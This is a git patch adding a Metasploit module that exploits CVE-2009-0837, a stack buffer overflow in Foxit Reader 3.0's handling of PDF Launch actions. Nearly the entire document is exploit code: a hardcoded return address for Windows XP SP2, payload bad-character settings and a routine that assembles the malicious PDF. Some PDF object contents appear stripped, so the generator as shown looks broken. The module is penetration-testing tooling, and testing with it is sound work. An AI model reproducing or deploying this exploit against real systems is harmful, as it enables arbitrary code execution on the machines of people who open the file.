From 41aac751e9322c402eb1637f5b1b875311db103e Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 18 May 2012 13:25:51 -0500 Subject: [PATCH] Add CVE-2009-0837 by bannedit - Foxit Reader 3 Launch Action Buffer Overflow This was added last year, but yanked due to some reliability issues. bannedit gave me the updated version recently, and the issue he was having appears to be resolved. There is no good P/P/R to use in XP SP3, so that system isn't supported. --- .../windows/fileformat/foxit_reader_launch.rb | 109 ++++++++++++++++++ 1 file changed, 109 insertions(+) create mode 100644 modules/exploits/windows/fileformat/foxit_reader_launch.rb diff --git a/modules/exploits/windows/fileformat/foxit_reader_launch.rb b/modules/exploits/windows/fileformat/foxit_reader_launch.rb new file mode 100644 index 0000000000..af74e5ca34 --- /dev/null +++ b/modules/exploits/windows/fileformat/foxit_reader_launch.rb @@ -0,0 +1,109 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' +require 'zlib' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::FILEFORMAT + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Foxit Reader 3.0 Open Execute Action Stack Based Buffer Overflow', + 'Description' => %q{ + This module exploits a buffer overflow in Foxit Reader 3.0 builds 1301 and earlier. + Due to the way Foxit Reader handles the input from an "Launch" action, it is possible + to cause a stack-based buffer overflow, allowing an attacker to gain arbitrary code + execution under the context of the user. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'bannedit', # Metasploit module + ], + 'Version' => '$Revision: 14069 $', + 'References' => + [ + [ 'CVE' , '2009-0837' ], + [ 'OSVDB', '55614' ], + [ 'BID', '34035'], + [ 'URL', 'http://www.coresecurity.com/content/foxit-reader-vulnerabilities'] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + 'DisablePayloadHandler' => 'true', + }, + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0d\x22\x28\x29\x2F\x5c\x3c\x3e\x5e\x7e" + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Foxit Reader 3.0 Windows XP SP2', { 'Ret' => 0x74d34d3f} ], # ebp + offset + ], + 'DisclosureDate' => 'Mar 09 2009', + 'DefaultTarget' => 0)) + + register_options([ + OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), + ], self.class) + + end + + def exploit + pdf = make_pdf + file_create(pdf) + handler + end + + def make_pdf + action = "\n<>/NewWindow true>>" + + pdf = "%PDF-1.4\n" + pdf << "1 0 obj\n" + pdf << "<>/Contents 2 0 R " + pdf << "/Annots[ 24 0 R 25 0 R 9 0 R ]>>\n" + pdf << "endobj\n" + pdf << "4 0 obj\n" + pdf << "<>\n" + pdf << "endobj\n" + pdf << "7 0 obj\n" + pdf << "<>\n" + pdf << "endobj\n" + pdf << "9 0 obj\n" + pdf << "<>/BE<>/MK<>>>/AP<>/T()/A 12 0 R /AA 17 0 R >>\n" + pdf << "endobj\n" + pdf << "16 0 obj\n" + pdf << action + pdf << "endobj\n" + pdf << "17 0 obj\n" + pdf << "<>\n" + pdf << "endobj\n" + pdf << "trailer\n" + pdf << "<<00000000000000000000000000000000>]" + pdf << "/DocChecksum/00000000000000000000000000000000/Size 31>>\n" + pdf << "startxref\n" + pdf << "0000\n" + pdf << "%%EOF\n" + pdf + end +end \ No newline at end of file